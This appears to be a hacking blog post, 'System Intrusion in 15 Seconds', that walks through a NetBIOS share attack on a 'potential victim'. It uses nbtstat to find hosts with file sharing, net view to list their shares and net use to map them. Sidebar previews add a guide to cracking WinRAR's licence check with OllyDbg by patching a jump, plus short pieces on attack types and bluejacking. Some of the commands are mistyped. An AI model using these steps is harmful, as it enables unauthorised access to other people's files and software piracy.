SYSTEM INTRUSION IN 15 SECONDS


This is called a Netbios attack.
Nbstat –A
EX: nbstat –A 192.168.1.4
It check connection status of an ip address, scan on a range of IP address for systems with “File and Printer Sharing” turned on.
This will give you a result that looks like this
NetBIOS Remote Machine Name Table
____________________________________
Name Type Status
-------------------------------------------
J-1 <00> UNIQUE Registered
WORK <00> GROUP Registered
J-1 <03> UNIQUE Registered
J-1 <20> UNIQUE Registered
WORK <1E> GROUP Registered
WORK <1D> UNIQUE Registered
A hex code of <20> means you have file and printer sharing turned on.
The next step would be to find out what is being shared.
This is how:
Net view \\
EX:net view \\192.168.1.4

We get a response that looks something like this.

Shared resources at \\192.168.1.4
Sharename              Type Comment
MY DOCUMENTS          Disk
TEMP                         Disk
The command was completed successfully.

This shows the hacker that his potential victim has their My Documents Folder shared and their Temp directory shared. For the hacker to then get access to those folders his next command will be.
Net use x: \\\temp
Ex:net use x:\\192.168.1.4\temp

If all goes well for the hacker, he/she will then get a response of
(The command was completed successfully.)

Comments

Post a Comment

Popular posts from this blog

HOW TO CRACK WINRAR USING OLLYDBG

Winrar always show us a reminder saying “Please purchase Winrar licence” at the every startup of winrar, it’s irritating. It notify our trial/ evaluation period. It can be patch using ollydbg. I will tell u how.   Open ollydbg and open winrar in it. Now search for text string. “Reminder”. To do so right click in olldbg and search for All referenced text sting. A new window [Text strings referenced in winRAR::text] will open, right click on in that and click Search for text .Now a search box open enter reminder there. Now that we got that code that display REMINDER, double click on that it will take u to the mian program code. Now look for jump just before the code starts. There is jump JE SHORT 00441219,if we follow the jump lets see where it goes, to do this simply press Enter on the jump. Lets change jump from JE SHORT 00441219 to JMP SHORT 00441219 so that it noe becomes JUMP instead of JUMP EQUAL. To do that double click on that statement and change it. Then click Assembl
Read more

Hacking Attacks

Computer connected to internet are vulnerable top variety of exploits.System can be subjected to denial of service attacks that prevent other computers from connecting to them or prevent others computer from connecting to other computers on the internet.These attacks can cause them to cease operations either temporarily or permanently. Some of these attacks use vulnerability available in the third party components used by websites, such as shopping cart software.Other attacks have used vulnerabilities which are common in any web application such as SQL injection or XSS(Cross Site Scripting). Types of Attack There are two types of attack: Non technical attack Social Engineering attack Pretexting Phishing Smishing Vishing Tabnabbing Technical Attack DOS attack  Input Validation Attack Keyloggers Attack Sniffing Attack
Read more

Bluetooth Bluejack

Bluetooth technology operates by using low-power radio waves, communicating on a frequency of 2.45 gigahertz. This special frequency is also known as the ISM band, an open, unlicensed band set aside for industrial, scientific and medical devices. When a number of Bluetooth devices are switched on in the same area, they all share the same ISM band and can locate and communicate with each other, much like a pair of walkies talkies tuned to the same frequency are able to link up. Bluetooth technology users take advantage of this ability to network with other phone and can send text messages or electronic business cards to each other. To send information to another party, the user creates a personal contact name in his or her phone's address book -- the name can be anything from the sender's actual name to a clever nickname. Bluejackers have devised a simple technique to surprise their victims: Instead of creating a legitimate name in the address book, the bluejacker's me
Read more